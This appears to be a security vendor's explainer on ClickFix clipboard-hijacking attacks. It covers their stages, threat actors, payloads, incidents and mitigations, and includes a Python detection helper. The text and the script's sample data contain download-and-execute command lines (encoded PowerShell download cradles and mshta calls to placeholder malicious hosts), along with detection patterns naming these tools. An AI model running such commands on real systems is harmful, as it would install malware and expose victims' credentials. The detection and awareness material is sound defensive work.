What Is ClickFix?
ClickFix is a social engineering technique that manipulates victims into voluntarily executing malicious commands on their own devices. No exploit, no suspicious attachment — just a web page with seemingly official instructions and a victim who presses Enter.
This is not a technical vulnerability. It is an attack on human psychology — far more difficult for conventional security technology to block, because the user themselves becomes the 'last-mile executor' of the attack.
World's #2 Attack Vector (H1 2025)
ClickFix accounts for ~8% of all attacks blocked globally, making it the second-largest attack vector worldwide after conventional phishing. Growth in H1 2025 vs H2 2024: +517% (ESET Threat Report H1 2025).
How ClickFix Works — Step-by-Step
ClickFix succeeds because its presentation is convincing and its instructions feel routine. Here is the complete anatomy of this attack from initial contact to infection.
Initial Lure — Directing the Victim to a Malicious Page
Victims are directed to a malicious web page through various delivery channels:
- Phishing emails containing links that appear legitimate
- Malvertising — malicious ads on streaming or illegal download sites
- SEO poisoning — malicious sites ranking high in search results
- Compromised WordPress sites
- Fake GitHub issue notifications
- Forums or social media promoting cracked software
Fake Verification Page — The Convincing Deception
The page displays a lure that appears highly convincing, including:
- Fake reCAPTCHA/CAPTCHA: "Click I'm not a robot to continue"
- Fake Cloudflare Turnstile: "Bot protection verification required"
- Browser error: 'Your browser cannot display this content'
- Fake Google Meet/Teams/Zoom: 'Your microphone has an issue, run the repair tool'
- Fake Windows BSOD: a full blue screen display with 'repair' instructions
Clipboard Hijacking — Silent Malicious Injection
When the victim clicks a button ("I'm not a robot", "Fix It", "Verify"), JavaScript embedded in the page automatically copies a malicious command to the victim's clipboard — without their knowledge. The malicious code is placed at the beginning of the string while non-executable 'comments' are appended at the end to obscure the clipboard contents.
User Execution via Win+R — The Victim Runs the Command Themselves
A pop-up appears with seemingly official instructions: 'Press Windows+R, then press Ctrl+V, then press Enter to complete verification.' The victim follows these instructions without realizing they have just executed a malicious command through the Windows Run dialog. On macOS, victims are directed to open Terminal and paste a bash/curl command.
Payload Download — Fetching the Malware
The executed command typically takes the form of an encoded PowerShell command or an mshta.exe invocation that downloads a payload from the attacker's server. Real-world examples from Group-IB analysis:
- powershell.exe -eC [BASE64_ENCODED_COMMAND]
- powershell.exe -WindowStyle Hidden -EncodedCommand [...]
- mshta.exe 'https://malicious-domain.com/payload'
Multi-Stage Delivery — Fileless, Layered Infection
The loader fetches a second stage from a rotating domain. The second stage establishes persistence (registry, scheduled task), attempts to disable protections, and injects the final payload into legitimate Windows processes (such as explorer.exe). The final payload — typically an infostealer or RAT — runs entirely in memory without writing files to disk, evading many traditional antivirus solutions.
History & Evolution of ClickFix
ClickFix did not emerge overnight. It evolved gradually from a simple trick into the preferred tool of nation-state espionage groups.
| Period | Key Event |
|---|---|
| October 2023 | First detection — a simple variant impersonating Cloudflare anti-bot. Not yet named 'ClickFix' |
| March 2024 | Proofpoint documents it extensively. TA571 and ClearFake cluster become early adopters. The name 'ClickFix' enters use |
| May 2024 | ClearFake integrates ClickFix + EtherHiding (payload hidden in BNB Chain smart contracts). Payload: Emmenhtal Loader and Lumma Stealer |
| August 2024 | Mass adoption. SmartApeSG distributes Remcos RAT, NetSupport RAT, StealC, and Sectop RAT via ClickFix |
| October 2024 | APT28 (Russia) begins using ClickFix — the first time this criminal technique is adopted by a nation-state actor |
| November 2024 | MuddyWater (Iran) attacks 39+ Middle Eastern organizations with ClickFix |
| December 2024 | UNK_RemoteRogue (Russia) targets defense weapons manufacturers |
| Jan–Feb 2025 | Kimsuky (North Korea) begins using ClickFix to target DPRK policy think tanks |
| H1 2025 | ESET reports +517% surge. ClickFix becomes the world's second-largest attack vector |
| June 2025 | Researcher mr.d0x introduces FileFix — a ClickFix evolution using the Windows File Explorer address bar. 14 days later it appears in live attacks |
| Q1 2026 | Seven active variants identified: ClickFix original, TerminalFix, DownloadFix, FileFix, ClickFake Interview, CrashFix, and the macOS Matryoshka variant |
Who Is Using ClickFix?
What makes ClickFix especially alarming is not just its prevalence, but who is using it. Within a 90-day window between October 2024 and January 2025, five nation-state groups from four different countries adopted this technique — an unprecedented rate of criminal-to-state-actor technology transfer.
Criminal Actors
- TA571 — Initial Access Broker, first ClickFix adopter
- ClearFake — Fake browser update + EtherHiding
- SmartApeSG (ZPHP) — Multi-payload delivery chain
- Storm-1865 — Global Booking.com campaign
- Storm-1607 — Tens of thousands of emails to US & Canada
- Interlock Group — Ransomware targeting healthcare sector
Nation-State / APT
- APT28 (Russia) — Espionage via fake Google Spreadsheet
- UNK_RemoteRogue (Russia) — Targeting defense weapons manufacturers
- MuddyWater (Iran) — 39+ organizations in the Middle East
- Kimsuky (North Korea) — DPRK policy think tanks
- APT36 / Transparent Tribe (Pakistan) — Confirmed May 2025
Malware Delivered via ClickFix
ClickFix is payload-agnostic — it is simply a delivery mechanism. Once the victim executes the command, virtually any type of malware can be deployed. This is what makes it so dangerous: a single social engineering technique can result in data theft, ransomware, or espionage operations.
Lumma Stealer
Category: Infostealer. The most common payload — responsible for 51% of ClickFix infections. Steals browser credentials, crypto wallets, session cookies, and 2FA codes.
NetSupport RAT
Category: RAT. A Remote Access Trojan that leverages the legitimate NetSupport Manager tool to conceal its activity from security detection.
Interlock Ransomware
Category: Ransomware. The Interlock group uses ClickFix as initial access before deploying ransomware in the healthcare sector — DaVita and Kettering Health are confirmed victims.
QuasarRAT
Category: Espionage. An open-source RAT used by Kimsuky (North Korea) for espionage operations against DPRK policy think tanks in the US and Japan.
DarkGate & Latrodectus
Category: Loader. Multi-function modular loaders that can download additional payloads, establish persistence, and operate as long-term backdoors.
AMOS (Atomic macOS Stealer)
Category: macOS. A macOS-specific variant that steals browser credentials, crypto wallets, and other sensitive data — ClickFix is not exclusively a Windows threat.
Documented Real-World Incidents & Campaigns
ClickFix is not merely a theoretical technique. The following are well-documented campaigns and incidents that demonstrate the real-world impact of these attacks across industries and geographies.
DaVita Ransomware — March 2025
Category: Healthcare. The second-largest kidney dialysis provider in the US. Initial intrusion via ClickFix on March 24, 2025, detected April 12. Interlock ransomware claimed 1.5 TB of stolen data — 2.7 million patient records exposed.
Kettering Health — May 2025
Category: Healthcare. 14 hospitals and 120+ clinics across the US Midwest. An Interlock ransomware attack via ClickFix caused thousands of medical procedures to be cancelled. Patient data, medical records, bank statements, and passport scans were stolen.
Storm-1865 Booking.com — Dec 2024
Category: Hospitality. Fake emails from 'Booking.com' to hotel staff regarding 'negative guest reviews'. Targets: South Asia, Southeast Asia, North America, Oceania, Europe. Payloads: XWorm, Lumma Stealer, VenomRAT, AsyncRAT, Danabot.
APT28 Espionage — October 2024
Category: Nation-State. Russia (APT28) impersonated Google Spreadsheet with a fake reCAPTCHA. When victims 'verified', they unknowingly opened an SSH tunnel to a Metasploit server — used for espionage operations.
MuddyWater / Iran — November 2024
Category: Nation-State. Deliberately launched to coincide with Microsoft Patch Tuesday to make 'security alert' emails appear credible. Attacked 39+ financial and government organizations in the Middle East using Level RMM tools for espionage.
Kimsuky / North Korea — Jan 2025
Category: Espionage. Impersonated Japanese diplomatic correspondence to deceive DPRK policy think tank researchers in the US, Japan, and South Korea. Victims saw a decoy PDF while QuasarRAT was silently installed in the background.
Statistics & Prevalence 2025
The following quantitative data illustrates the massive scale of ClickFix adoption in a short period — from a niche technique to a global threat faced by nearly every organization.
| Figure | What it measures | Source |
|---|---|---|
| +517% | Attack growth in H1 2025 vs H2 2024 | ESET Threat Report |
| #2 | Largest attack vector globally after conventional phishing | ESET H1 2025 |
| ~8% | Of all attacks blocked globally (H1 2025) | ESET |
| 47% | Of Microsoft Defender Experts initial access notifications involved ClickFix | Microsoft |
| 5 APT | Nation-state groups from 4 different countries within 90 days | Proofpoint |
| 51% | Of ClickFix infections delivered Lumma Stealer as the primary payload | Industry Analysis |
Why Do Users Fall Victim?
ClickFix succeeds not because of technology failure, but because it exploits how the human brain works. Understanding these psychological factors is the first step in building effective security awareness.
Verification Fatigue
Years of CAPTCHAs and security prompts have conditioned users to complete them automatically without scrutiny. They are perceived as 'routine obstacles', not danger signals.
Authority Mimicry
ClickFix pages impersonate trusted services with pixel-perfect accuracy: Google reCAPTCHA, Cloudflare, Booking.com, Microsoft Office. Trust in these brands transfers to the fraudulent page.
Problem-Solution Framing
ClickFix always presents a 'problem' (browser error, video won't load) along with a 'solution' that appears easy and logical. The human brain instinctively seeks to resolve problems.
Urgency Creation
Countdown timers, fake counters ('127 users have already verified'), and warnings that 'your account will be suspended' create psychological pressure that reduces critical thinking capacity.
Exploiting Security Awareness
Users who are already 'phishing-aware' are vigilant about attachments. ClickFix uses no attachments — it is a normal web page with technical instructions. Conventional cognitive defenses do not apply.
Illusion of Control
Victims feel they are 'in control' because they are the ones choosing to press the button. In reality, they are being manipulated. This is psychologically far more effective than a drive-by download.
How to Detect ClickFix Attacks
ClickFix is designed to evade traditional detection because no malicious file is downloaded initially — only a user executing a command. However, there are several artifacts and signals that can be detected.
| Detection Method | What to Look For | Tool/Platform |
|---|---|---|
| Registry Audit | RunMRU key containing PowerShell, mshta, certutil, Base64 strings, or -WindowStyle Hidden | Windows Registry / SIEM |
| Windows Event ID 4688 | powershell.exe or mshta.exe spawned by explorer.exe (not an IDE or terminal) | Windows Event Log / SIEM |
| PowerShell Script Block (Event 4104) | EncodedCommand, DownloadString, Invoke-Expression, or download URLs within scripts | PowerShell Logging / SIEM |
| EDR Behavioral Detection | Process chain: explorer.exe → powershell.exe → mshta.exe / certutil.exe / bitsadmin.exe | EDR / XDR Platform |
| Network Detection | Outbound connections to new domains (<30 days old), PowerShell with unusual user-agent, DNS queries to unknown domains | Firewall / IDS / DNS Filter |
| Threat Intel Integration | IoCs from Recorded Future Risk Lists, VirusTotal, ANY.RUN for active ClickFix-related domains and hashes | SIEM / Threat Intel Feed |
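As an added example (not from the original article or from any vendor tool), the following Python triage helper applies the RunMRU, Event 4688 and Event 4104 indicators from the table above to constructed sample data: it strips the RunMRU value suffix, decodes -EncodedCommand payloads before matching, and checks for the explorer.exe parent chain. The sample values and the example.invalid domain are constructed; the event field names follow the NewProcessName/ParentProcessName fields of Event 4688.

```python
import base64
import re
# LOLBINs from the detection table; explorer.exe spawning one of these is the ClickFix chain.
LOLBINS = {"powershell.exe", "pwsh.exe", "mshta.exe", "certutil.exe", "bitsadmin.exe"}
# Command-line markers listed in the RunMRU and Event 4104 rows above.
SUSPICIOUS = re.compile(
    r"(?:-e(?:c|nc|ncodedcommand)?\s|-windowstyle\s+hidden|downloadstring|"
    r"invoke-expression|\biex\b|mshta|certutil|bitsadmin|https?://)", re.I)
ENCODED_ARG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)

def decode_encoded_command(cmdline: str) -> str:
    """Decode a PowerShell -EncodedCommand argument (Base64 of UTF-16LE); '' if absent."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le", errors="ignore")
    except ValueError:  # malformed Base64 (binascii.Error is a ValueError)
        return ""

def runmru_findings(entries: dict) -> list:
    """Flag RunMRU values; the registry stores each command with a trailing '\\1'."""
    hits = []
    for name, raw in entries.items():
        if name == "MRUList":  # ordering metadata, not a command
            continue
        cmd = raw[:-2] if raw.endswith("\\1") else raw
        text = cmd + " " + decode_encoded_command(cmd)  # also match inside the decoded payload
        tags = sorted({m.group(0).lower().strip() for m in SUSPICIOUS.finditer(text)})
        if tags:
            hits.append((name, cmd, tags))
    return hits

def suspicious_process_chain(event: dict) -> bool:
    """Event 4688 check: a LOLBIN whose parent is explorer.exe (Run dialog), not a shell or IDE."""
    child = event["NewProcessName"].rsplit("\\", 1)[-1].lower()
    parent = event["ParentProcessName"].rsplit("\\", 1)[-1].lower()
    return child in LOLBINS and parent == "explorer.exe"

# Constructed samples (not real telemetry); example.invalid is a reserved placeholder domain.
ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/x')".encode("utf-16-le")).decode()
SAMPLE_RUNMRU = {"MRUList": "cba", "a": "notepad.exe\\1",
                 "b": f"powershell.exe -WindowStyle Hidden -EncodedCommand {ENCODED}\\1",
                 "c": "mshta.exe https://example.invalid/verify\\1"}
SAMPLE_EVENTS = [
    {"NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentProcessName": r"C:\Windows\explorer.exe"},
    {"NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentProcessName": r"C:\Program Files\Microsoft VS Code\Code.exe"}]
```

On a live host the RunMRU dictionary would be read from HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU and the event dictionaries from exported 4688 records; the matching logic is unchanged.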
ClickFix Prevention & Mitigation
No single control is sufficient to stop ClickFix. A combination of technical hardening, personnel training, and layered detection capabilities is required.
Security Awareness Training
Train users to NEVER execute commands from web page instructions. Show real examples of ClickFix pages. Communicate clearly: 'No legitimate CAPTCHA will ever ask you to open the Run dialog or a Terminal.'
Disable Windows Run Dialog via GPO
User Configuration > Administrative Templates > Start Menu and Taskbar > Remove Run menu from Start Menu. This eliminates the primary execution vector for ClickFix.
PowerShell Hardening
Apply Constrained Language Mode, enable Script Block Logging and Transcription Logging, and set Execution Policy to AllSigned or Restricted for non-administrator users.
Block mshta.exe for Standard Users
MSHTA is a Living Off the Land Binary (LOLBIN) favored by ClickFix. Deploy AppLocker or WDAC to prevent its execution by non-administrator users.
Deploy EDR with Behavioral Protection
Ensure your EDR can detect suspicious process chains and is updated with the latest ClickFix signatures. Behavioral detection is far more effective than signature-based approaches for this threat.
DNS Filtering & Web Proxy
Block known malicious domains, newly registered domains (<30 days), and uncategorized sites. A Malicious Domain Blocking and Reporting (MDBR) service provides an additional layer of protection.
Email Security with URL Sandboxing
Filter emails containing links to new domains, sandbox URLs before users can click them, and enforce SPF/DKIM/DMARC to prevent domain spoofing.
Application Allowlisting
Whitelist approved applications and block unknown executables from %APPDATA%, %TEMP%, and other directories commonly used by ClickFix loaders.
Southeast Asia & Indonesia Threat Landscape
While no fully documented ClickFix campaign has exclusively targeted Indonesia, several major campaigns have explicitly named Southeast Asia as a target region — and Indonesia's risk factors are highly significant.
The Storm-1865 campaign impersonating Booking.com (December 2024 – March 2025) explicitly targeted 'South and Southeast Asia' alongside North America, Oceania, and Europe. Given the scale of Indonesia's hospitality and tourism industry, the potential impact is very real.
Indonesia's Risk Factors to Watch
210+ million internet users, a massive and increasingly digital SME sector, a large hospitality industry that was an explicit Storm-1865 target, security awareness that still needs improvement, and widespread use of global services (Google, Microsoft) that are ideal ClickFix impersonation targets. During Ramadan/Eid, phishing — including ClickFix-based techniques — increases by 30% according to LKDI data.
| Figure | What it measures | Source |
|---|---|---|
| 2× | Cyber attacks in Southeast Asia doubled in 2024 vs 2023 | Positive Technologies |
| 57,000+ | Ransomware incidents in Asia Pacific in H1 2024 | Industry Report |
| Top 6 | Indonesia ranks among the most ransomware-impacted countries in Southeast Asia | Regional Analysis |
ClickFix requires no exploit — only psychological manipulation. CloudSphere helps your organization test its resilience against social engineering attacks through Security Assessment & VAPT.